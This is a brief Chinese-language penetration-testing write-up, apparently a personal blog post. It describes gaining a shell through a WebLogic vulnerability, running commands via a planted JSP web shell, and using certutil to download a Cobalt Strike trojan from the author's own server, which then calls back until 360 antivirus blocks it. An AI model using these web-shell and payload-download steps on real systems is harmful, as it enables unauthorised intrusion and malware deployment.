- 利用weblogic漏洞获取了一个shell,执行系统命令,当前是管理员权限
-
http://x.x.x.x:7001/_async/.shell123.jsp?pwd=123&cmd=dir
1.jpg
-
利用cs生成木马
2.jpg
- 远程下载木马到当前目录
#当前网站目录
D:\Oracle\Middleware\user_projects\domains\base_dtdx_domain
#远程下载命令
http://x.x.x.x:7001/_async/.shell123.jsp?pwd=123&cmd=certutil -urlcache -split -f http://自己的服务器ip/artifact.exe artifact.exe
3.jpg
4.jpg
-
运行木马之后的确上线了
5.jpg
-
但是任何功能都使用不了,为什么的呢?不会被杀了吧
6.jpg
- 原来是360全家桶,接下来没思路了,暂且就到这里吧,是时候研究一下免杀了。。。
- 结束进程,撤退
tasklist
taskkill /f /pid 000











网友评论